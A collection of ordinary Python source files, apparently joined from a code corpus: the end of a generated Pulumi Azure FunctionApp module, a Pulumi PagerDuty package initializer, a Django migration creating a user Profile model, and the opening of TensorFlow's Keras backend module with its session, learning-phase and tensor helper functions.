* `client_secret` (`pulumi.Input[str]`)
* `oauthScopes` (`pulumi.Input[list]`)
* `runtimeVersion` (`pulumi.Input[str]`)
* `tokenRefreshExtensionHours` (`pulumi.Input[float]`)
* `tokenStoreEnabled` (`pulumi.Input[bool]`)
* `twitter` (`pulumi.Input[dict]`)
* `consumerKey` (`pulumi.Input[str]`)
* `consumerSecret` (`pulumi.Input[str]`)
* `unauthenticatedClientAction` (`pulumi.Input[str]`)
The **connection_strings** object supports the following:
* `name` (`pulumi.Input[str]`) - The name of the Connection String.
* `type` (`pulumi.Input[str]`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
* `value` (`pulumi.Input[str]`) - The value for the Connection String.
The **identity** object supports the following:
* `principalId` (`pulumi.Input[str]`) - The Principal ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `tenantId` (`pulumi.Input[str]`) - The Tenant ID for the Service Principal associated with the Managed Service Identity of this App Service.
* `type` (`pulumi.Input[str]`) - The type of the Connection String. Possible values are `APIHub`, `Custom`, `DocDb`, `EventHub`, `MySQL`, `NotificationHub`, `PostgreSQL`, `RedisCache`, `ServiceBus`, `SQLAzure` and `SQLServer`.
The **site_config** object supports the following:
* `alwaysOn` (`pulumi.Input[bool]`) - Should the Function App be loaded at all times? Defaults to `false`.
* `cors` (`pulumi.Input[dict]`) - A `cors` block as defined below.
* `allowedOrigins` (`pulumi.Input[list]`)
* `supportCredentials` (`pulumi.Input[bool]`)
* `ftpsState` (`pulumi.Input[str]`) - State of FTP / FTPS service for this function app. Possible values include: `AllAllowed`, `FtpsOnly` and `Disabled`.
* `http2Enabled` (`pulumi.Input[bool]`) - Specifies whether or not the http2 protocol should be enabled. Defaults to `false`.
* `linuxFxVersion` (`pulumi.Input[str]`) - Linux App Framework and version for the AppService, e.g. `DOCKER|(golang:latest)`.
* `minTlsVersion` (`pulumi.Input[str]`) - The minimum supported TLS version for the function app. Possible values are `1.0`, `1.1`, and `1.2`. Defaults to `1.2` for new function apps.
* `use32BitWorkerProcess` (`pulumi.Input[bool]`) - Should the Function App run in 32 bit mode, rather than 64 bit mode? Defaults to `true`.
* `virtualNetworkName` (`pulumi.Input[str]`) - The name of the Virtual Network which this App Service should be attached to.
* `websocketsEnabled` (`pulumi.Input[bool]`) - Should WebSockets be enabled?
The **site_credential** object supports the following:
* `password` (`pulumi.Input[str]`) - The password associated with the username, which can be used to publish to this App Service.
* `username` (`pulumi.Input[str]`) - The username which can be used to publish to this App Service
> This content is derived from https://github.com/terraform-providers/terraform-provider-azurerm/blob/master/website/docs/r/function_app.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["app_service_plan_id"] = app_service_plan_id
__props__["app_settings"] = app_settings
__props__["auth_settings"] = auth_settings
__props__["client_affinity_enabled"] = client_affinity_enabled
__props__["connection_strings"] = connection_strings
__props__["default_hostname"] = default_hostname
__props__["enable_builtin_logging"] = enable_builtin_logging
__props__["enabled"] = enabled
__props__["https_only"] = https_only
__props__["identity"] = identity
__props__["kind"] = kind
__props__["location"] = location
__props__["name"] = name
__props__["outbound_ip_addresses"] = outbound_ip_addresses
__props__["possible_outbound_ip_addresses"] = possible_outbound_ip_addresses
__props__["resource_group_name"] = resource_group_name
__props__["site_config"] = site_config
__props__["site_credential"] = site_credential
__props__["storage_connection_string"] = storage_connection_string
__props__["tags"] = tags
__props__["version"] = version
return FunctionApp(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import importlib
# Make subpackages available:
__all__ = ['config']
for pkg in __all__:
if pkg != 'config':
importlib.import_module(f'{__name__}.{pkg}')
# Export this package's modules as members:
from .addon import *
from .business_service import *
from .escalation_policy import *
from .event_rule import *
from .extension import *
from .get_business_service import *
from .get_escalation_policy import *
from .get_extension_schema import *
from .get_priority import *
from .get_schedule import *
from .get_service import *
from .get_team import *
from .get_user import *
from .get_vendor import *
from .maintenance_window import *
from .provider import *
from .ruleset import *
from .ruleset_rule import *
from .schedule import *
from .service import *
from .service_dependency import *
from .service_integration import *
from .team import *
from .team_membership import *
from .user import *
from .user_contact_method import *
from .user_notification_rule import *
|
# Generated by Django 3.1.3 on 2020-11-20 20:07
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
# pylint: disable=redefined-outer-name
# pylint: disable=redefined-builtin
"""Keras backend API.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import itertools
import json
import os
import threading
import weakref
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as session_module
from tensorflow.python.distribute import distribute_coordinator as dc
from tensorflow.python.distribute import distribute_coordinator_context as dc_context
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.eager import context
from tensorflow.python.eager import function as eager_function
from tensorflow.python.eager import lift_to_graph
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_module
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend_config
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import ctc_ops as ctc
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gradients as gradients_module
from tensorflow.python.ops import image_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import map_fn as map_fn_lib
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables as variables_module
from tensorflow.python.training import server_lib
from tensorflow.python.util import nest
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import keras_export
py_all = all
py_sum = sum
# INTERNAL UTILS
# The internal graph maintained by Keras and used by the symbolic Keras APIs
# while executing eagerly (such as the functional API for model-building).
_GRAPH = None
# A graph which is used for constructing functions in eager mode.
_CURRENT_SCRATCH_GRAPH = None
# This is a thread local object that will hold the default internal TF session
# used by Keras. It can be set manually via `set_session(sess)`.
_SESSION = threading.local()
# This dictionary holds a mapping {graph: learning_phase}.
# A learning phase is a bool tensor used to run Keras models in
# either train mode (learning_phase == 1) or test mode (learning_phase == 0).
_GRAPH_LEARNING_PHASES = weakref.WeakKeyDictionary()
# _DUMMY_EAGER_GRAPH is used as a key in _GRAPH_LEARNING_PHASES.
# We keep a separate reference to it to make sure it does not get removed from
# _GRAPH_LEARNING_PHASES.
_DUMMY_EAGER_GRAPH = threading.local()
# This boolean flag can be set to True to leave variable initialization
# up to the user.
# Change its value via `manual_variable_initialization(value)`.
_MANUAL_VAR_INIT = False
# This list holds the available devices.
# It is populated when `_get_available_gpus()` is called for the first time.
# We assume our devices don't change henceforth.
_LOCAL_DEVICES = None
# This dictionary holds a mapping between a graph and variables to initialize
# in the graph.
_GRAPH_VARIABLES = weakref.WeakKeyDictionary()
# This dictionary holds a mapping between a graph and TF optimizers created in
# the graph.
_GRAPH_TF_OPTIMIZERS = weakref.WeakKeyDictionary()
# The below functions are kept accessible from backend for compatibility.
epsilon = backend_config.epsilon
floatx = backend_config.floatx
image_data_format = backend_config.image_data_format
set_epsilon = backend_config.set_epsilon
set_floatx = backend_config.set_floatx
set_image_data_format = backend_config.set_image_data_format
@keras_export('keras.backend.backend')
def backend():
"""Publicly accessible method for determining the current backend.
Only exists for API compatibility with multi-backend Keras.
Returns:
The string "tensorflow".
"""
return 'tensorflow'
@keras_export('keras.backend.cast_to_floatx')
def cast_to_floatx(x):
"""Cast a Numpy array to the default Keras float type.
Arguments:
x: Numpy array.
Returns:
The same Numpy array, cast to its new type.
Example:
```python
>>> from keras import backend as K
>>> K.floatx()
'float32'
>>> arr = numpy.array([1.0, 2.0], dtype='float64')
>>> arr.dtype
dtype('float64')
>>> new_arr = K.cast_to_floatx(arr)
>>> new_arr
array([ 1., 2.], dtype=float32)
>>> new_arr.dtype
dtype('float32')
```
"""
return np.asarray(x, dtype=floatx())
# A global dictionary mapping graph objects to an index of counters used
# for various layer names in each graph.
# Allows to give unique autogenerated names to layers, in a graph-specific way.
PER_GRAPH_LAYER_NAME_UIDS = weakref.WeakKeyDictionary()
@keras_export('keras.backend.get_uid')
def get_uid(prefix=''):
"""Associates a string prefix with an integer counter in a TensorFlow graph.
Arguments:
prefix: String prefix to index.
Returns:
Unique integer ID.
Example:
```
>>> get_uid('dense')
1
>>> get_uid('dense')
2
```
"""
graph = get_graph()
if graph not in PER_GRAPH_LAYER_NAME_UIDS:
PER_GRAPH_LAYER_NAME_UIDS[graph] = collections.defaultdict(int)
layer_name_uids = PER_GRAPH_LAYER_NAME_UIDS[graph]
layer_name_uids[prefix] += 1
return layer_name_uids[prefix]
@keras_export('keras.backend.reset_uids')
def reset_uids():
"""Resets graph identifiers.
"""
per_graph_layer_name_uids = PER_GRAPH_LAYER_NAME_UIDS
keys = list(per_graph_layer_name_uids.keys())
for key in keys:
del per_graph_layer_name_uids[key]
@keras_export('keras.backend.clear_session')
def clear_session():
"""Destroys the current TF graph and creates a new one.
Useful to avoid clutter from old models / layers.
"""
global _SESSION
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
global _GRAPH_VARIABLES # pylint: disable=global-variable-not-assigned
global _GRAPH_TF_OPTIMIZERS # pylint: disable=global-variable-not-assigned
ops.reset_default_graph()
reset_uids()
_SESSION.session = None
graph = get_graph()
with graph.as_default():
with ops.name_scope(''):
phase = array_ops.placeholder_with_default(
False, shape=(), name='keras_learning_phase')
_GRAPH_LEARNING_PHASES = {}
_GRAPH_LEARNING_PHASES[graph] = phase
_GRAPH_VARIABLES.pop(graph, None)
_GRAPH_TF_OPTIMIZERS.pop(graph, None)
@keras_export('keras.backend.manual_variable_initialization')
def manual_variable_initialization(value):
"""Sets the manual variable initialization flag.
This boolean flag determines whether
variables should be initialized
as they are instantiated (default), or if
the user should handle the initialization
(e.g. via `tf.initialize_all_variables()`).
Arguments:
value: Python boolean.
"""
global _MANUAL_VAR_INIT
_MANUAL_VAR_INIT = value
@keras_export('keras.backend.learning_phase')
def learning_phase():
"""Returns the learning phase flag.
The learning phase flag is a bool tensor (0 = test, 1 = train)
to be passed as input to any Keras function
that uses a different behavior at train time and test time.
Returns:
Learning phase (scalar integer tensor or Python integer).
"""
if ops.get_default_graph() is _GRAPH:
# Don't enter an init_scope for the learning phase if eager execution
# is enabled but we're inside the Keras workspace graph.
return symbolic_learning_phase()
with ops.init_scope():
# We always check & set the learning phase inside the init_scope,
# otherwise the wrong default_graph will be used to look up the learning
# phase inside of functions & defuns.
#
# This is because functions & defuns (both in graph & in eager mode)
# will always execute non-eagerly using a function-specific default
# subgraph.
if context.executing_eagerly():
if _DUMMY_EAGER_GRAPH not in _GRAPH_LEARNING_PHASES:
# Fallback to inference mode as default.
return 0
return _GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH]
return symbolic_learning_phase()
def symbolic_learning_phase():
graph = get_graph()
with graph.as_default():
if graph not in _GRAPH_LEARNING_PHASES:
with ops.name_scope(''):
phase = array_ops.placeholder_with_default(
False, shape=(), name='keras_learning_phase')
_GRAPH_LEARNING_PHASES[graph] = phase
return _GRAPH_LEARNING_PHASES[graph]
@keras_export('keras.backend.set_learning_phase')
def set_learning_phase(value):
"""Sets the learning phase to a fixed value.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
Raises:
ValueError: if `value` is neither `0` nor `1`.
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
if value not in {0, 1}:
raise ValueError('Expected learning phase to be 0 or 1.')
with ops.init_scope():
if context.executing_eagerly():
# In an eager context, the learning phase values applies to both the eager
# context and the internal Keras graph.
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = value
_GRAPH_LEARNING_PHASES[get_graph()] = value
def set_eager_learning_phase(value):
"""Internal utility that sets the learning phase in eager execution only.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
assert value in {0, 1}
assert context.executing_eagerly()
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = value
@keras_export('keras.backend.learning_phase_scope')
@tf_contextlib.contextmanager
def learning_phase_scope(value):
"""Provides a scope within which the learning phase is equal to `value`.
The learning phase gets restored to its original value upon exiting the scope.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
Yields:
None.
Raises:
ValueError: if `value` is neither `0` nor `1`.
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
if value not in {0, 1}:
raise ValueError('Expected learning phase to be 0 or 1.')
with ops.init_scope():
if context.executing_eagerly():
previous_eager_value = _GRAPH_LEARNING_PHASES.get(
_DUMMY_EAGER_GRAPH, None)
previous_graph_value = _GRAPH_LEARNING_PHASES.get(get_graph(), None)
try:
set_learning_phase(value)
yield
finally:
# Restore learning phase to initial value.
with ops.init_scope():
if context.executing_eagerly():
if previous_eager_value is not None:
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = previous_eager_value
elif _DUMMY_EAGER_GRAPH in _GRAPH_LEARNING_PHASES:
del _GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH]
graph = get_graph()
if previous_graph_value is not None:
_GRAPH_LEARNING_PHASES[graph] = previous_graph_value
elif graph in _GRAPH_LEARNING_PHASES:
del _GRAPH_LEARNING_PHASES[graph]
@tf_contextlib.contextmanager
def eager_learning_phase_scope(value):
"""Internal scope that sets the learning phase in eager execution only.
Arguments:
value: Learning phase value, either 0 or 1 (integers).
Yields:
None.
Raises:
ValueError: if `value` is neither `0` nor `1`.
"""
global _GRAPH_LEARNING_PHASES # pylint: disable=global-variable-not-assigned
assert value in {0, 1}
assert context.executing_eagerly()
previous_value = learning_phase()
try:
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = value
yield
finally:
# Restore learning phase to initial value.
_GRAPH_LEARNING_PHASES[_DUMMY_EAGER_GRAPH] = previous_value
def _current_graph(op_input_list):
"""Return the graph members of `op_input_list`, or the current graph."""
return ops._get_graph_from_inputs(op_input_list)
def _get_session(op_input_list=()):
"""Returns the session object for the current thread."""
global _SESSION
default_session = ops.get_default_session()
if default_session is not None:
session = default_session
else:
if ops.inside_function():
raise RuntimeError('Cannot get session inside Tensorflow graph function.')
# If we don't have a session, or that session does not match the current
# graph, create and cache a new session.
if (getattr(_SESSION, 'session', None) is None or
_SESSION.session.graph is not _current_graph(op_input_list)):
# If we are creating the Session inside a tf.distribute.Strategy scope,
# we ask the strategy for the right session options to use.
if distribution_strategy_context.has_strategy():
configure_and_create_distributed_session(
distribution_strategy_context.get_strategy())
else:
_SESSION.session = session_module.Session(
config=get_default_session_config())
session = _SESSION.session
return session
@keras_export(v1=['keras.backend.get_session'])
def get_session(op_input_list=()):
"""Returns the TF session to be used by the backend.
If a default TensorFlow session is available, we will return it.
Else, we will return the global Keras session assuming it matches
the current graph.
If no global Keras session exists at this point:
we will create a new global session.
Note that you can manually set the global session
via `K.set_session(sess)`.
Arguments:
op_input_list: An option sequence of tensors or ops, which will be used
to determine the current graph. Otherwise the default graph will be
used.
Returns:
A TensorFlow session.
"""
session = _get_session(op_input_list)
if not _MANUAL_VAR_INIT:
with session.graph.as_default():
_initialize_variables(session)
return session
def get_graph():
if context.executing_eagerly():
global _GRAPH
if _GRAPH is None:
_GRAPH = func_graph.FuncGraph('keras_graph')
return _GRAPH
else:
return ops.get_default_graph()
@tf_contextlib.contextmanager
def _scratch_graph(graph=None):
"""Retrieve a shared and temporary func graph.
The eager execution path lifts a subgraph from the keras global graph into
a scratch graph in order to create a function. DistributionStrategies, in
turn, constructs multiple functions as well as a final combined function. In
order for that logic to work correctly, all of the functions need to be
created on the same scratch FuncGraph.
Args:
graph: A graph to be used as the current scratch graph. If not set then
a scratch graph will either be retrieved or created:
Yields:
The current scratch graph.
"""
global _CURRENT_SCRATCH_GRAPH
if (_CURRENT_SCRATCH_GRAPH is not None and graph is not None and
_CURRENT_SCRATCH_GRAPH is not graph):
raise ValueError('Multiple scratch graphs specified.')
if _CURRENT_SCRATCH_GRAPH:
yield _CURRENT_SCRATCH_GRAPH
return
graph = graph or func_graph.FuncGraph('keras_scratch_graph')
try:
_CURRENT_SCRATCH_GRAPH = graph
yield graph
finally:
_CURRENT_SCRATCH_GRAPH = None
@keras_export('keras.backend.set_session')
def set_session(session):
"""Sets the global TensorFlow session.
Arguments:
session: A TF Session.
"""
global _SESSION
_SESSION.session = session
def get_default_session_config():
if not os.environ.get('OMP_NUM_THREADS'):
config = config_pb2.ConfigProto(allow_soft_placement=True)
else:
num_thread = int(os.environ.get('OMP_NUM_THREADS'))
config = config_pb2.ConfigProto(
intra_op_parallelism_threads=num_thread,
inter_op_parallelism_threads=num_thread,
allow_soft_placement=True)
return config
# DEVICE MANIPULATION
class _TfDeviceCaptureOp(object):
"""Class for capturing the TF device scope."""
def __init__(self):
self.device = None
def _set_device(self, device):
"""This method captures TF's explicit device scope setting."""
self.device = device
def _get_current_tf_device():
"""Return explicit device of current context, otherwise returns `None`.
Returns:
If the current device scope is explicitly set, it returns a string with
the device (`CPU` or `GPU`). If the scope is not explicitly set, it will
return `None`.
"""
graph = get_graph()
op = _TfDeviceCaptureOp()
graph._apply_device_functions(op)
return op.device
def _is_current_explicit_device(device_type):
"""Check if the current device is explicitly set on the device type specified.
Arguments:
device_type: A string containing `GPU` or `CPU` (case-insensitive).
Returns:
A boolean indicating if the current device scope is explicitly set on the
device type.
Raises:
ValueError: If the `device_type` string indicates an unsupported device.
"""
device_type = device_type.upper()
if device_type not in ['CPU', 'GPU']:
raise ValueError('`device_type` should be either "CPU" or "GPU".')
device = _get_current_tf_device()
return device is not None and device.device_type == device_type.upper()
def _get_available_gpus():
"""Get a list of available gpu devices (formatted as strings).
Returns:
A list of available GPU devices.
"""
if ops.executing_eagerly_outside_functions():
# Returns names of devices directly.
return [name for name in context.list_devices() if 'GPU' in name]
global _LOCAL_DEVICES
if _LOCAL_DEVICES is None:
_LOCAL_DEVICES = get_session().list_devices()
return [x.name for x in _LOCAL_DEVICES if x.device_type == 'GPU']
def _has_nchw_support():
"""Check whether the current scope supports NCHW ops.
TensorFlow does not support NCHW on CPU. Therefore we check if we are not
explicitly put on
CPU, and have GPUs available. In this case there will be soft-placing on the
GPU device.
Returns:
bool: if the current scope device placement would support nchw
"""
explicitly_on_cpu = _is_current_explicit_device('CPU')
gpus_available = bool(_get_available_gpus())
return not explicitly_on_cpu and gpus_available
# VARIABLE MANIPULATION
def _constant_to_tensor(x, dtype):
"""Convert the input `x` to a tensor of type `dtype`.
This is slightly faster than the _to_tensor function, at the cost of
handling fewer cases.
Arguments:
x: An object to be converted (numpy arrays, floats, ints and lists of
them).
dtype: The destination type.
Returns:
A tensor.
"""
return constant_op.constant(x, dtype=dtype)
def _to_tensor(x, dtype):
"""Convert the input `x` to a tensor of type `dtype`.
Arguments:
x: An object to be converted (numpy array, list, tensors).
dtype: The destination type.
Returns:
A tensor.
"""
return ops.convert_to_tensor(x, dtype=dtype)
@keras_export('keras.backend.is_sparse')
def is_sparse(tensor):
"""Returns whether a tensor is a sparse tensor.
Arguments:
tensor: A tensor instance.
Returns:
A boolean.
Example:
```python
>>> from keras import backend as K
>>> a = K.placeholder((2, 2), sparse=False)
>>> print(K.is_sparse(a))
False
>>> b = K.placeholder((2, 2), sparse=True)
>>> print(K.is_sparse(b))
True
```
"""
return isinstance(tensor, sparse_tensor.SparseTensor)
@keras_export('keras.backend.to_dense')
def to_dense(tensor):
"""Converts a sparse tensor into a dense tensor and returns it.
Arguments:
tensor: A tensor instance (potentially sparse).
Returns:
A dense tensor.
Examples:
```python
>>> from keras import backend as K
>>> b = K.placeholder((2, 2), sparse=True)
>>> print(K.is_sparse(b))
True
>>> c = K.to_dense(b)
>>> print(K.is_sparse(c))
False
```
"""
if is_sparse(tensor):
return sparse_ops.sparse_tensor_to_dense(tensor)
else:
return tensor
name_scope = ops.name_scope
@keras_export('keras.backend.variable')
def variable(value, dtype=None, name=None, constraint=None):
"""Instantiates a variable and returns it.
Arguments:
value: Numpy array, initial value of the tensor.
dtype: Tensor type.
name: Optional name string for the tensor.
constraint: Optional projection function to be
applied to the variable after an optimizer update.
Returns:
A variable instance (with Keras metadata included).
Examples:
```python
>>> import numpy as np
>>> from keras import backend as K
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val, dtype='float64', name='example_var')
>>> K.dtype(kvar)
'float64'
>>> print(kvar)
example_var
>>> kvar.eval()
array([[ 1., 2.],
[ 3., 4.]])
```
"""
if dtype is None:
dtype = floatx()
if hasattr(value, 'tocoo'):
sparse_coo = value.tocoo()
indices = np.concatenate((np.expand_dims(sparse_coo.row, 1), np.expand_dims(
sparse_coo.col, 1)), 1)
v = sparse_tensor.SparseTensor(
indices=indices, values=sparse_coo.data, dense_shape=sparse_coo.shape)
v._keras_shape = sparse_coo.shape
return v
v = resource_variable_ops.ResourceVariable(
value,
dtype=dtypes_module.as_dtype(dtype),
name=name,
constraint=constraint)
if isinstance(value, np.ndarray):
v._keras_shape = value.shape
elif hasattr(value, 'shape'):
v._keras_shape = int_shape(value)
track_variable(v)
return v
def track_tf_optimizer(tf_optimizer):
"""Tracks the given TF optimizer for initialization of its variables."""
if context.executing_eagerly():
return
graph = get_graph()
optimizers = _GRAPH_TF_OPTIMIZERS.setdefault(graph, weakref.WeakSet())
optimizers.add(tf_optimizer)
def track_variable(v):
"""Tracks the given variable for initialization."""
if context.executing_eagerly():
return
graph = v.graph if hasattr(v, 'graph') else get_graph()
if graph not in _GRAPH_VARIABLES:
_GRAPH_VARIABLES[graph] = weakref.WeakSet()
_GRAPH_VARIABLES[graph].add(v)
def _get_variables(graph=None):
"""Returns variables corresponding to the given graph for initialization."""
assert not context.executing_eagerly()
variables = _GRAPH_VARIABLES.setdefault(graph, weakref.WeakSet())
for opt in _GRAPH_TF_OPTIMIZERS.get(graph, set()):
variables.update(opt.optimizer.variables())
return variables
def _initialize_variables(session):
"""Utility to initialize uninitialized variables on the fly."""
variables = _get_variables(get_graph())
candidate_vars = []
for v in variables:
if not getattr(v, '_keras_initialized', False):
candidate_vars.append(v)
if candidate_vars:
# This step is expensive, so we only run it on variables not already
# marked as initialized.
is_initialized = session.run(
[variables_module.is_variable_initialized(v) for v in candidate_vars])
uninitialized_vars = []
for flag, v in zip(is_initialized, candidate_vars):
if not flag:
uninitialized_vars.append(v)
v._keras_initialized = True
if uninitialized_vars:
session.run(variables_module.variables_initializer(uninitialized_vars))
@keras_export('keras.backend.constant')
def constant(value, dtype=None, shape=None, name=None):
"""Creates a constant tensor.
Arguments:
value: A constant value (or list)
dtype: The type of the elements of the resulting tensor.
shape: Optional dimensions of resulting tensor.
name: Optional name for the tensor.
Returns:
A Constant Tensor.
"""
if dtype is None:
dtype = floatx()
# If the outer context is eager but we are executing under the keras
# FuncGraph, we create EagerTensors and use them as constants.
if (ops.executing_eagerly_outside_functions() and
getattr(get_graph(), 'name', '') == 'keras_graph'):
with ops.init_scope():
return constant_op.constant(value, dtype=dtype, shape=shape, name=name)
return constant_op.constant(value, dtype=dtype, shape=shape, name=name)
def is_keras_tensor(x):
"""Returns whether `x` is a Keras tensor.
A "Keras tensor" is a tensor that was returned by a Keras layer,
(`Layer` class) or by `Input`.
Arguments:
x: A candidate tensor.
Returns:
A boolean: Whether the argument is a Keras tensor.
Raises:
ValueError: In case `x` is not a symbolic tensor.
Examples:
```python
>>> import tensorflow as tf
>>> import numpy
>>> from keras import backend as K
>>> from keras.layers import Input, Dense
>>> np_var = numpy.array([1, 2])
>>> K.is_keras_tensor(np_var) # A numpy array is not a symbolic tensor.
ValueError
>>> k_var = tf.placeholder('float32', shape=(1,1))
>>> K.is_keras_tensor(k_var) # A variable indirectly created outside of
keras is not a Keras tensor.
False
>>> keras_var = K.variable(np_var)
>>> K.is_keras_tensor(keras_var) # A variable created with the keras
backend is not a Keras tensor.
False
>>> keras_placeholder = K.placeholder(shape=(2, 4, 5))
>>> K.is_keras_tensor(keras_placeholder) # A placeholder is not a Keras
tensor.
False
>>> keras_input = Input([10])
>>> K.is_keras_tensor(keras_input) # An Input is a Keras tensor.
True
>>> keras_layer_output = Dense(10)(keras_input)
>>> K.is_keras_tensor(keras_layer_output) # Any Keras layer output is a
Keras tensor.
True
```
"""
if not isinstance(x, (ops.Tensor,
variables_module.Variable,
sparse_tensor.SparseTensor)):
raise ValueError('Unexpectedly found an instance of type `' + str(type(x)) +
'`. Expected a symbolic tensor instance.')
return hasattr(x, '_keras_history')
@keras_export('keras.backend.placeholder')
def placeholder(shape=None, ndim=None, dtype=None, sparse=False, name=None):
"""Instantiates a placeholder tensor and returns it.
Arguments:
shape: Shape of the placeholder
(integer tuple, may include `None` entries).
ndim: Number of axes of the tensor.
At least one of {`shape`, `ndim`} must be specified.
If both are specified, `shape` is used.
dtype: Placeholder type.
sparse: Boolean, whether the placeholder should have a sparse type.
name: Optional name string for the placeholder.
Raises:
ValueError: If called with eager execution.
Returns:
Tensor instance (with Keras metadata included).
Examples:
```python
>>> from keras import backend as K
>>> input_ph = K.placeholder(shape=(2, 4, 5))
>>> input_ph
<tf.Tensor 'Placeholder_4:0' shape=(2, 4, 5) dtype=float32>
```
"""
if dtype is None:
dtype = floatx()
if not shape:
if ndim:
shape = tuple([None for _ in range(ndim)])
with get_graph().as_default():
if sparse:
x = array_ops.sparse_placeholder(dtype, shape=shape, name=name)
else:
x = array_ops.placeholder(dtype, shape=shape, name=name)
return x
def is_placeholder(x):
"""Returns whether `x` is a placeholder.
Arguments:
x: A candidate placeholder.
Returns:
Boolean.
"""
try:
return x.op.type == 'Placeholder'
except AttributeError:
return False
@keras_export('keras.backend.shape')
def shape(x):
"""Returns the symbolic shape of a tensor or variable.
Arguments:
x: A tensor or variable.
Returns:
A symbolic shape (which is itself a tensor).
Examples:
```python
# TensorFlow example
>>> from keras import backend as K
>>> tf_session = K.get_session()
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val)
>>> input = keras.backend.placeholder(shape=(2, 4, 5))
>>> K.shape(kvar)
<tf.Tensor 'Shape_8:0' shape=(2,) dtype=int32>
>>> K.shape(input)
<tf.Tensor 'Shape_9:0' shape=(3,) dtype=int32>
# To get integer shape (Instead, you can use K.int_shape(x))
>>> K.shape(kvar).eval(session=tf_session)
array([2, 2], dtype=int32)
>>> K.shape(input).eval(session=tf_session)
array([2, 4, 5], dtype=int32)
```
"""
return array_ops.shape(x)
@keras_export('keras.backend.int_shape')
def int_shape(x):
"""Returns the shape of tensor or variable as a tuple of int or None entries.
Arguments:
x: Tensor or variable.
Returns:
A tuple of integers (or None entries).
Examples:
```python
>>> from keras import backend as K
>>> input = K.placeholder(shape=(2, 4, 5))
>>> K.int_shape(input)
(2, 4, 5)
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val)
>>> K.int_shape(kvar)
(2, 2)
```
"""
try:
shape = x.shape
if not isinstance(shape, tuple):
shape = tuple(shape.as_list())
return shape
except ValueError:
return None
@keras_export('keras.backend.ndim')
def ndim(x):
"""Returns the number of axes in a tensor, as an integer.
Arguments:
x: Tensor or variable.
Returns:
Integer (scalar), number of axes.
Examples:
```python
>>> from keras import backend as K
>>> input = K.placeholder(shape=(2, 4, 5))
>>> val = np.array([[1, 2], [3, 4]])
>>> kvar = K.variable(value=val)
>>> K.ndim(input)
3
>>> K.ndim(kvar)
2
```
"""
dims = x.shape._dims
if dims is not None:
return len(dims)
return None
@keras_export('keras.backend.dtype')
def dtype(x):
"""Returns the dtype of a Keras tensor or variable, as a string.
Arguments:
x: Tensor or variable.
Returns:
String, dtype of `x`.
Examples:
```python
>>> from keras import backend as K
>>> K.dtype(K.placeholder(shape=(2,4,5)))
'float32'
>>> K.dtype(K.placeholder(shape=(2,4,5), dtype='float32'))
'float32'
